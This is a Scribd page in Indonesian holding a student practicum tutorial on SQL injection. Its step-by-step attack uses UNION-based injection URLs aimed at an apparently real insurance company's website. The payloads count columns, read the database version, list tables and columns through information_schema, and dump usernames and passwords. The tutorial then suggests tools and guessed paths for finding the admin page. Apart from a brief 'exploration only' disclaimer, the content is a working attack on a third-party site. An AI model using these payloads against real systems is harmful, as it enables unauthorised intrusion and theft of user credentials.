0% menganggap dokumen ini bermanfaat (0 suara)
202 tayangan

Tutorial SQL Injection

Dokumen tersebut merupakan tutorial SQL injection yang memberikan panduan langkah demi langkah untuk melakukan SQL injection terhadap suatu website mulai dari mengetes kelemahan SQL injection, menemukan versi database, mengidentifikasi nama tabel dan kolom, hingga mendapatkan username dan password pengguna dari database tersebut.

Diunggah oleh

Roby Rido
Hak Cipta
© Attribution Non-Commercial (BY-NC)
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai PPTX, PDF, TXT atau baca online di Scribd
0% menganggap dokumen ini bermanfaat (0 suara)
202 tayangan

Tutorial SQL Injection

Dokumen tersebut merupakan tutorial SQL injection yang memberikan panduan langkah demi langkah untuk melakukan SQL injection terhadap suatu website mulai dari mengetes kelemahan SQL injection, menemukan versi database, mengidentifikasi nama tabel dan kolom, hingga mendapatkan username dan password pengguna dari database tersebut.

Diunggah oleh

Roby Rido
Hak Cipta
© Attribution Non-Commercial (BY-NC)
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai PPTX, PDF, TXT atau baca online di Scribd
Anda di halaman 1/ 12

Tutorial SQL Injection

Praktikum Sistem Keamanan Informasi Semester Genap 2010/2011


By : Muhammad Wildan 06052011

!!!!!!!!!!!!!!!!!!!!!
Dimohon agar mempergunakan cara2 yg ada di bawah ini dengan hati-hati. Pergunakan hanya dalam rangka eksplorasi, tidak untuk merusak !! Segala informasi yg di dapatkan dalam latihan ini di mohon tidak di publikasikan / dipergunakan / diperjualbelikan demi kepentingan pribadi !! :D

1
Untuk kasus uji coba kita coba link di bawah ini :

http://www.ceylinco-insurance.com/products.php?id=1

2
Untuk mengetahui situs tsb vulnerable atau tidak, coba kita sisipkan tanda (kutip) di akhir URL.
http://www.ceylinco-insurance.com/products.php?id=1 Bila muncul seperti ini :

Maka situs ini siap dijadikan target SQL INJECTION !!!

3
untuk mencari banyak kolom yang digunakan database website tersebut kita menggunakan command ORDER BY. Cth :
http://www.ceylinco-insurance.com/products.php?id=-1 order by 1--

Atau
http://www.ceylinco-insurance.com/products.php?id=-1 order by 10/*

4
Menemukan ERROR ??
Jika belum maka kita tingkatkan ke kolom 2
http://www.ceylinco-insurance.com/products.php?id=-1 order by 2-Hingga seterusnya, sampai menemukan ERROR seperti ini :

5
Untuk melihat versi SQL database yang website itu gunakan :
http://www.ceylinco-insurance.com/products.php?id=1 union all select 1,2,3,4,5,6,7,8,9,10,11,12--

6
Rubah link sebelumnya sesuai dengan angka yg keluar di tahap 5 :
http://www.ceylinco-insurance.com/products.php?id=1 union all select 1,2,@@version,4,5,6,7,8,9,10,11,12 from information_schema.tables-karena yg muncul angka 3

7
Selanjutnya kita masuk ke tahap mencari nama tabel dan kolom :
http://www.ceylinco-insurance.com/products.php?id=-1 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()--

Lalu perhatikan deretan kata2 yg muncul !! Itu adalah nama2 tabel yg ada di dalam situs tsb..

8
kita ambil table user dan dapatkan kolom dari table user tersebut, tetapi table user ini kita convert dulu menggunakan hexa decimal (untuk caranya cari banyak ada di om gugle :p) :
http://www.ceylinco-insurance.com/products.php?id=-1 union all select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0x75736572-hasil convert hexadecimal dari tabel user

9
Setelah berhasil mendapatkan kolom dari tabel user maka, TIBALAH di tahap yg paling di tunggu2, MENDAPATKAN USERNAME dn PASSWORD ..!! :D
http://www.ceylinco-insurance.com/products.php?id=-1 union all select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12 from user--

hasil convert dari tanda : (titik dua)

Setelah dengan bangga mendapatka usernm dn passwrd, sekarang hanya tinggal mencari halmn adminny saja.. Bisa menggunakan tools : havij, aquanetix, dll atau dengan cara meraba2 halmn adminny, cth : /admin, /administrator, /admincp, dll

10

Anda mungkin juga menyukai